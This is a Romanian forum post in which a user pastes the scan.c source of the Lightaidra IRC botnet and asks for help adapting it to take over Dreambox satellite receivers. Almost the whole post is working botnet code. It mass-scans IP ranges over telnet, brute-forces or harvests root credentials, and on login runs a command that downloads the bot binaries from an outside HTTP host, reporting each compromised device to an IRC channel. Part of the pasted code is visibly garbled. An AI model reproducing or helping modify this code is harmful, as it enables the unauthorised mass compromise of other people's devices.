Jump to content
gugustiuc

Intrebare C++

Recommended Posts

In primul rand va salut pe toti.Am gasit si eu tot pe aici scanner-ul/botnet-ul lightaidra.

Treaba e ca intra doar in routere si tot felul de ciudatenii.

M-am uitat peste fisierul scan.c si stiu unde trebuie modificat pt ce imi trebuie mie(receivere de sat mipsel/ppc)

Ce am eu nevoie(partea de autentificare) e asa:

##############################

welcome on your dreambox! - Kernel 2.6.9 (18:54:07).

dreambox login: root

Password:

BusyBox v1.01 (2009.12.12-13:19+0000) Built-in shell (ash)

Enter 'help' for a list of built-in commands.

root@dreambox:~>

####################################

sau asa:

####################################

welcome on your dreambox!

Kernel 2.6.18-7.4-dm500hd (#1 SMP Fri Feb 24 16:00:00 CET 2012).

dm500hd login: root

Password:

root@dm500hd:~#

####################################

din ce am vazut in scan.c cred ca da failure chiar daca intra in ele deoarece nu ii apare lui ce-i trebuie dupa ce baga parola:

#####################################################################

/* cmd_advscan_getpass(sock_t *) */ 
/* advance scanner password finder. */
int cmd_advscan_getpass(sock_t *scan_sp)
{
char temp[801];
char *one, *two;

if (sockwrite(scan_sp->sockfd, post_request) == false)
return EXIT_FAILURE;

recv(scan_sp->sockfd, temp, 100, 0);
recv(scan_sp->sockfd, temp, 800, 0);
one = strtok(temp, "<");

while (one != NULL)
{
if (strstr(one, "password>"))
{
two = strtok(one, ">");
while (two != NULL)
{
if (strcmp(two, "password") != true)
{
snprintf(psw_x, strlen(two) + 3,
"%s\r\n", two);
return EXIT_SUCCESS;
}
two = strtok(NULL, ">");
}
}
one = strtok(NULL, "<");
}
return EXIT_FAILURE;
}

/*
* scan.c - USE LIGHTAIDRA AT YOUR OWN RISK!
*
* Lightaidra - IRC-based mass router scanner/exploiter.
* Copyright (C) Federico Fazzi, <federico@ahacktivia.org>.
*
*/

#include "../include/headers.h"

int sockwrite(int sd, const char *fmt, ...);
int cmd_advscan_getpass(sock_t *scan_sp);
void *scan_address(scan_data_t *scan_data);
int cmd_advscan_control(char *addr, sock_t *sp, requests_t *req,
unsigned short type);
int cmd_advscan_join(char *addr, sock_t *sp, requests_t *req,
unsigned short type);

/* cmd_scan_central(sock_t *, requests_t *, unsigned short) */
/* start scanner with vuln type. */
void cmd_scan_central(sock_t *sp, requests_t *req, unsigned short type)
{
unsigned short a, b, c;
int i, x;
pthread_t pthds[maxthreads];
scan_data_t scan_data[maxthreads];

total = 0;
founds = 0;
c = 0;

sleep(2);
remove(result_file);
resfd = fopen(result_file, "a+");
if (resfd == NULL)
{
sockwrite(sp->sockfd, "PRIVMSG %s :[error] unable to open: %s\n",
channel, result_file);
sockwrite(sp->sockfd, "QUOTE ZOMBIE\n");
exit(EXIT_FAILURE);
}

memset(hosts, 0, sizeof hosts);
for (a = 0; a <= 255; a++)
{
for (b = 0; b <= 255; b++)
{
snprintf(hosts[c], sizeof(hosts[c]), "%s.%s.%d.%d",
req->rcv_sb, req->rcv_sc, a, ;
c++;
}
}

for (i = 0; i <= maxhosts;)
{
if (strlen(hosts[i]) < 7)
break;

for (x = 0; x < maxthreads; x++, i++)
{
if (strlen(hosts[i]) < 7)
break;

memset(scan_data[x].hostname, 0, sizeof(scan_data[x].hostname));
snprintf(scan_data[x].hostname, 31, "%s", hosts[i]);

if (pthread_create
(&pthds[x], NULL, (void *)&scan_address,
(scan_data_t *) & scan_data[x]) != 0)
{
if(all_messages)
sockwrite(sp->sockfd, "PRIVMSG %s :[crash] scanner has crashed, continuing to pwning..\n",
channel);
goto crash;
}
}

for (x = 0; x < maxthreads; x++)
{
if (strlen(hosts[i]) < 7)
break;
if (pthread_join(pthds[x], NULL) != 0)
{
if(all_messages)
sockwrite(sp->sockfd, "PRIVMSG %s :[crash] scanner has crashed, continuing to pwning..\n",
channel);
goto crash;
}
}
}

crash:

if (!total)
{
if(all_messages)
sockwrite(sp->sockfd, "PRIVMSG %s :[advscan] scanner completed, founds %d ips..\n",
channel, total);
exit(EXIT_SUCCESS);
}
else
{
if(all_messages)
sockwrite(sp->sockfd, "PRIVMSG %s :[advscan] scanner completed, founds %d ips, pwning time..\n",
channel, total);
}

if ((resfd = fopen(result_file, "r+")) == NULL)
{
sockwrite(sp->sockfd, "PRIVMSG %s :[error] unable to open: %s\n",
channel, result_file);
sockwrite(sp->sockfd, "QUOTE ZOMBIE\n");
exit(EXIT_FAILURE);
}

while (fgets(resbuf, sizeof(resbuf) - 1, resfd) != NULL)
{
sscanf(resbuf, "%16s", restag);
if (cmd_advscan_control(restag, sp, req, type) == 0)
{
if (all_messages)
{
if (type == 1)
{
sockwrite(sp->sockfd,
"PRIVMSG %s :[vuln] address: %s (user:%s pass:%s) possible vuln with default password!\n",
channel, restag, req->rcv_sd, req->rcv_se);
}
else if (type == 2)
{
strncpy(psw_y, psw_x, strlen(psw_x) - 2);
sockwrite(sp->sockfd,
"PRIVMSG %s :[vuln] address: %s (user:root pass:%s) possible vuln with config file post request!\n",
channel, restag, psw_y);
}
}
}
memset(restag, 0, sizeof restag);
}

fclose(resfd);
sockwrite(sp->sockfd, "QUOTE ZOMBIE\n");
exit(EXIT_FAILURE);
}

/* scan_address(scan_data_t *) */
/* start addresses scanner. */
void *scan_address(scan_data_t *scan_data)
{
FILE *rfd;
int retv, flags;
fd_set rd, wr;
char temp[128];
sock_t *scan_isp;

scan_isp = (sock_t *) malloc(sizeof(sock_t));

if (!(scan_isp->sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP)))
pthread_exit(NULL);

memset(temp, 0, sizeof temp);
memset(&scan_isp->sockadr, 0, sizeof scan_isp->sockadr);
scan_isp->sockadr.sin_port = htons(telnet_port);
scan_isp->sockadr.sin_family = AF_INET;

timeout_value = 1;
tm.tv_sec = timeout_value;
tm.tv_usec = 500000;

if (!inet_aton((const char *)scan_data->hostname, (struct in_addr *)&scan_isp->sockadr.sin_addr))
{
close(scan_isp->sockfd);
free(scan_isp);
pthread_exit(NULL);
}

flags = fcntl(scan_isp->sockfd, F_GETFL, 0);
if (fcntl(scan_isp->sockfd, F_SETFL, O_NONBLOCK) == false)
{
close(scan_isp->sockfd);
free(scan_isp);
pthread_exit(NULL);
}

if (connect(scan_isp->sockfd, (struct sockaddr *)&scan_isp->sockadr,
sizeof(scan_isp->sockadr)) == -1)
{
if (errno != EINPROGRESS)
{
close(scan_isp->sockfd);
free(scan_isp);
pthread_exit(NULL);
}
}

FD_SET(scan_isp->sockfd, &wr);
if (!(retv = select(scan_isp->sockfd + 1, NULL, &wr, NULL, &tm)))
{
close(scan_isp->sockfd);
free(scan_isp);
pthread_exit(NULL);
}
else if (retv == false)
{
close(scan_isp->sockfd);
free(scan_isp);
pthread_exit(NULL);
}

if (recv(scan_isp->sockfd, temp, sizeof(temp) - 1, 0) != false) //--
{
close(scan_isp->sockfd);
free(scan_isp);
pthread_exit(NULL);
}

if (errno != EWOULDBLOCK)
{
close(scan_isp->sockfd);
free(scan_isp);
pthread_exit(NULL);
}

FD_SET(scan_isp->sockfd, &rd);
if (!(retv = select(scan_isp->sockfd + 1, &rd, NULL, NULL, &tm)))
{
close(scan_isp->sockfd);
free(scan_isp);
pthread_exit(NULL);
}
else if (retv == -1)
{
close(scan_isp->sockfd);
free(scan_isp);
pthread_exit(NULL);
}
else
{
if ((fcntl(scan_isp->sockfd, F_SETFL, flags)) == false)
{
close(scan_isp->sockfd);
free(scan_isp);
pthread_exit(NULL);
}

if (recv(scan_isp->sockfd, temp, sizeof(temp) - 1, 0) != false)
{
rfd = fopen(result_file, "a+");
if (rfd != NULL)
{
fprintf(rfd, "%s\n", scan_data->hostname);
fflush(rfd);
fclose(rfd);
total++;
}
}
}
close(scan_isp->sockfd);
free(scan_isp);
pthread_exit(NULL);
}

/* __alarm() */
/* for socket timeout. */
void __alarm()
{
close(scan_sp->sockfd);
return;
}

/* cmd_advscan_control(char *, sock_t *, requests_t *) */
/* advance scanner init. */
int cmd_advscan_control(char *addr, sock_t *sp,
requests_t *req, unsigned short type)
{
if (type == 1)
{
if (cmd_advscan_join(addr, sp, req, 1) == true)
{
founds++;
return EXIT_SUCCESS;
}
else
return EXIT_FAILURE;
}
else if (type == 2)
{
scan_sp = (sock_t *) malloc(sizeof(sock_t));
scan_sp->sockhs = gethostbyname(addr);
scan_sp->sockfd = socket(AF_INET, SOCK_STREAM, 0);
scan_sp->sockadr.sin_family = AF_INET;
scan_sp->sockadr.sin_port = htons(http_port);
scan_sp->sockadr.sin_addr =
*((struct in_addr *)scan_sp->sockhs->h_addr);
memset(scan_sp->sockadr.sin_zero, '\0',
sizeof scan_sp->sockadr.sin_zero);

timeout_value = 1;
tm.tv_sec = timeout_value;
tm.tv_usec = 500000;

signal(SIGALRM, __alarm);
alarm(timeout_value);
if (connect
(scan_sp->sockfd, (struct sockaddr *)&scan_sp->sockadr,
sizeof scan_sp->sockadr) == false)
{
alarm(0);
signal(SIGALRM, SIG_DFL);
free(scan_sp);
return EXIT_FAILURE;
}

if (cmd_advscan_getpass(scan_sp) == true)
{
close(scan_sp->sockfd);
free(scan_sp);
if (cmd_advscan_join(addr, sp, req, 2) == true)
{
founds++;
return EXIT_SUCCESS;
}
else
return EXIT_FAILURE;
}
}
close(scan_sp->sockfd);
free(scan_sp);
return EXIT_FAILURE;
}

/* cmd_advscan_getpass(sock_t *) */
/* advance scanner password finder. */
int cmd_advscan_getpass(sock_t *scan_sp)
{
char temp[801];
char *one, *two;

if (sockwrite(scan_sp->sockfd, post_request) == false)
return EXIT_FAILURE;

recv(scan_sp->sockfd, temp, 100, 0);
recv(scan_sp->sockfd, temp, 800, 0);
one = strtok(temp, "<");

while (one != NULL)
{
if (strstr(one, "password>"))
{
two = strtok(one, ">");
while (two != NULL)
{
if (strcmp(two, "password") != true)
{
snprintf(psw_x, strlen(two) + 3,
"%s\r\n", two);
return EXIT_SUCCESS;
}
two = strtok(NULL, ">");
}
}
one = strtok(NULL, "<");
}
return EXIT_FAILURE;
}

/* cmd_advscan_join(char *, sock_t *, requests_t *) */
/* advance scanner (router validate control). */
int cmd_advscan_join(char
*addr, sock_t *sp, requests_t *req, unsigned short type)
{
unsigned short e = 0;

scan_sp = (sock_t *) malloc(sizeof(sock_t));
scan_sp->sockhs = gethostbyname(addr);
scan_sp->sockfd = socket(AF_INET, SOCK_STREAM, 0);
scan_sp->sockadr.sin_family = AF_INET;
scan_sp->sockadr.sin_port = htons(telnet_port);

scan_sp->sockadr.sin_addr =
*((struct in_addr *)scan_sp->sockhs->h_addr);

memset(scan_sp->sockadr.sin_zero, '\0',
sizeof scan_sp->sockadr.sin_zero);

timeout_value = 2;
tm.tv_sec = timeout_value;
tm.tv_usec = 500000;

setsockopt(scan_sp->sockfd, SOL_SOCKET,
SO_RCVTIMEO,(char *)&tm,sizeof(struct timeval));

/* ignore ++ KILLED BY SIGPIPE ++ */
signal(SIGPIPE, SIG_IGN);

signal(SIGALRM, __alarm);
alarm(timeout_value);
if (connect(scan_sp->sockfd, (struct sockaddr *)&scan_sp->sockadr,
sizeof scan_sp->sockadr) == false)
{
alarm(0);
signal(SIGALRM, SIG_DFL);
free(scan_sp);
return EXIT_FAILURE;
}

if (type == 1)
{
if (sockwrite(scan_sp->sockfd, "%s\r\n", req->rcv_sd) == false)
e++;
recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0);

if (sockwrite(scan_sp->sockfd, "%s\r\n", req->rcv_se) == false)
e++;
recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0);

}
else if (type == 2)
{
if (send(scan_sp->sockfd, "root\r\n", strlen("root\r\n"), MSG_NOSIGNAL) ==
false)
e++;
recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0);
send(scan_sp->sockfd, psw_x, strlen(psw_x), MSG_NOSIGNAL);
recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0);
}

if (e)
{
close(scan_sp->sockfd);
free(scan_sp);
return EXIT_FAILURE;
}

memset(__netbuf, 0, sizeof __netbuf);
recv_bytes = recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0);

if (recv_bytes == -1)
{
close(scan_sp->sockfd);
free(scan_sp);
return EXIT_FAILURE;
}
__netbuf[recv_bytes] = 0;

if (strchr(__netbuf, '#') != NULL || strchr(__netbuf, '$') != NULL)
{
sockwrite(scan_sp->sockfd, getbinaries, reference_http);
recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0);
recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0);
sleep(3);

close(scan_sp->sockfd);
free(scan_sp);
return EXIT_SUCCESS;
}

close(scan_sp->sockfd);
free(scan_sp);
return EXIT_FAILURE;
}

Nu prea am inteles ..am tot incercat sa modific valorile de mai sus dar fara nici un rezultat.

Am cautat pe google tutoriale despre C si de o sapt tot caut dar nu prea am gasit ce sa ma ajute si stiu ca pt multi de aici e un lucru banal..

Va multumesc pt ajutor oricat de mic ar fi el.

Toate cele bune.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...